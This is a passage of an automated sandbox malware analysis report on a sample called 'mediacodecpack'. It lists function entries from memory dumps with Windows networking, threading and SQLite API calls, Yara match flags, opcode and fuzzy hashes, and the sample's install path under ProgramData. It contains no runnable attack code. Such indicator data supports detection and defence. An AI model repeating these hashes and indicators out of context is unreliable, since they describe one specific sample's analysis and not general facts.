                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D1E37E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: f53415c199010815f47e5c98500bfa680ff800c6a59ccfbc4c504f74d4850bff
                                                                                • Instruction ID: 5ddfad7da1d3d2a2e25fe05be8c9a61e34364dab28e7e2f705e267600f7d9c03
                                                                                • Opcode Fuzzy Hash: f53415c199010815f47e5c98500bfa680ff800c6a59ccfbc4c504f74d4850bff
                                                                                • Instruction Fuzzy Hash: FE31AD30604256BFEB258E75E844BAE7BA6FF41315F158629ECA487A90E730EC50DB90
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                • String ID:
                                                                                • API String ID: 1648232842-0
                                                                                • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 02D1DDD7
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,00000001,?,?,?,?), ref: 02D1DE34
                                                                                • GetLastError.KERNEL32(?,?,00000001,?,?,?,?), ref: 02D1DE50
                                                                                • _memset.LIBCMT ref: 02D1DE66
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 773584764-0
                                                                                • Opcode ID: c6c903628529cbcc0999159392276b4ffe54744da2bd56bfb93f0bf19d78d558
                                                                                • Instruction ID: 0fb16b02216908fc325963bf0b4b19823fd430601488a999b52367f05ab16d12
                                                                                • Opcode Fuzzy Hash: c6c903628529cbcc0999159392276b4ffe54744da2bd56bfb93f0bf19d78d558
                                                                                • Instruction Fuzzy Hash: 2B21CF71600340BBDF319F69F984BAA3B66DF52B25F0441A9F8494BB81EB308D41CBA1
                                                                                APIs
                                                                                • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 3429445273-0
                                                                                • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                APIs
                                                                                • htons.WS2_32(?), ref: 02D03DA2
                                                                                  • Part of subcall function 02D03BD3: __EH_prolog.LIBCMT ref: 02D03BD8
                                                                                  • Part of subcall function 02D03BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D03BED
                                                                                • htonl.WS2_32(00000000), ref: 02D03DB9
                                                                                • htonl.WS2_32(00000000), ref: 02D03DC0
                                                                                • htons.WS2_32(?), ref: 02D03DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                • String ID:
                                                                                • API String ID: 3882411702-0
                                                                                • Opcode ID: 8a0dfd7478b50b3421611b8db07b2a88cc8e440744f99c89508cf9cee6b90417
                                                                                • Instruction ID: 44f416a65f5b176d66bf574e3378bba0d4ba782bdb13aa83a3efa1c183832180
                                                                                • Opcode Fuzzy Hash: 8a0dfd7478b50b3421611b8db07b2a88cc8e440744f99c89508cf9cee6b90417
                                                                                • Instruction Fuzzy Hash: BB117C35A00219EFCF119F64E885EAAB7B9EF09315F018496FC04DF351E6719E28CBA5
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(?,00409174), ref: 0040D7CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: " -V$C:\ProgramData\MediaCodecPack\MediaCodecPack.exe$alue
                                                                                • API String ID: 1586166983-459380645
                                                                                • Opcode ID: ed19379fccfba028bd2e664b2cb76df66c71dd7388b54506488c581a9a9bb581
                                                                                • Instruction ID: fe00abdb1b4a8e930eba483c141473a49fda8a139f54b1ead8ff061b0a42f72d
                                                                                • Opcode Fuzzy Hash: ed19379fccfba028bd2e664b2cb76df66c71dd7388b54506488c581a9a9bb581
                                                                                • Instruction Fuzzy Hash: 2B01B8B285C7819FD3068EB54941AA17F70FE01724328867FE1E26E1D2C77AD00BDB4A
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D023D0
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D023DE
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02401
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D02408
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: a9f686015a2fa42b13982bf71ec47d407d9e758c4dece89d2a9efaae2c498b30
                                                                                • Instruction ID: d928590323d0dc85e1f13e4f4574b7be5341669629102387dd85b1faaccad256
                                                                                • Opcode Fuzzy Hash: a9f686015a2fa42b13982bf71ec47d407d9e758c4dece89d2a9efaae2c498b30
                                                                                • Instruction Fuzzy Hash: 9A11CE71601304ABDB249F60ED88FAAB7B8FF54718F20446DEA019B290D7B1EC55CBA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction ID: bbdd88ab99c4875b84ee2d61558aaec2d52c0dcd8b191b4e83c6b4b89f854c4d
                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction Fuzzy Hash: AF014C7240114ABBCF126E94EC018EE3F33BF19354F488415FA6899631C336C9B5EB91
                                                                                APIs
                                                                                • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                  • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 2673540737-0
                                                                                • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                • String ID:
                                                                                • API String ID: 3526213481-0
                                                                                • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                APIs
                                                                                • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                  • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                  • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                • sqlite3_step.SQLITE3 ref: 60969197
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                • String ID:
                                                                                • API String ID: 2877408194-0
                                                                                • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D024A9
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D024B8
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D024CD
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D024D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 61e0f8eee9ad576660164a95c3b063aeb1f42e8fa1957af111c71ed02b3a0a22
                                                                                • Instruction ID: b9596236ab7c5d0be3ddd7efc520ac5b538e32702e74ddfc849b081286240d9e
                                                                                • Opcode Fuzzy Hash: 61e0f8eee9ad576660164a95c3b063aeb1f42e8fa1957af111c71ed02b3a0a22
                                                                                • Instruction Fuzzy Hash: 29F08C72500204AFDB04AF65EC88F9ABBACFF18710F508019FA04C6241D771E964CFE0
                                                                                APIs
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID:
                                                                                • API String ID: 1477753154-0
                                                                                • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D02009
                                                                                • RtlDeleteCriticalSection.NTDLL(?), ref: 02D02028
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D02037
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D0204E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                • String ID:
                                                                                • API String ID: 2456309408-0
                                                                                • Opcode ID: 5efecf0520810530b2edba2fe2f264091d48d4b64288bfab891c1db3a622fa48
                                                                                • Instruction ID: d85baf1ae667ecfc3153229db7ed57fd4e6abdeff65989686a5d92fecd1207cc
                                                                                • Opcode Fuzzy Hash: 5efecf0520810530b2edba2fe2f264091d48d4b64288bfab891c1db3a622fa48
                                                                                • Instruction Fuzzy Hash: 1A01AD314017149BC738AF54E94CB9ABBB5EF24309F10491EE84292BA0C775AD58CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$H_prologSleep
                                                                                • String ID:
                                                                                • API String ID: 1765829285-0
                                                                                • Opcode ID: 0492c183ad0ac312b24eb5c6e8e11b2aefce1124da545d362d85dbbfa4d182ed
                                                                                • Instruction ID: d242251ece74041a8af19dd25489e4e0204e8841732f73a03f5c9721338d9e11
                                                                                • Opcode Fuzzy Hash: 0492c183ad0ac312b24eb5c6e8e11b2aefce1124da545d362d85dbbfa4d182ed
                                                                                • Instruction Fuzzy Hash: 8AF09A32A40110EFCB109F94E989B88BBA4FF0D321F1081A9F90A9B380C7349C18CBA0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: into$out of
                                                                                • API String ID: 632333372-1114767565
                                                                                • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmove
                                                                                • String ID: &'
                                                                                • API String ID: 3529519853-655172784
                                                                                • Opcode ID: b43791662cfc64ca41dcac3ea6d0bd76babf22681dd876ef8d2ddd244e802445
                                                                                • Instruction ID: b182c291df63b8381dc3a91052287305c997834491231cb31a31235dc1aac8c9
                                                                                • Opcode Fuzzy Hash: b43791662cfc64ca41dcac3ea6d0bd76babf22681dd876ef8d2ddd244e802445
                                                                                • Instruction Fuzzy Hash: E2616B71D002199BDF20DFA4C991BEEBBB6EF48710F10816AD419AB2E1D770AE45CF61
                                                                                APIs
                                                                                  • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_value_text
                                                                                • String ID: (NULL)$NULL
                                                                                • API String ID: 2175239460-873412390
                                                                                • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: -- $d
                                                                                • API String ID: 632333372-777087308
                                                                                • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
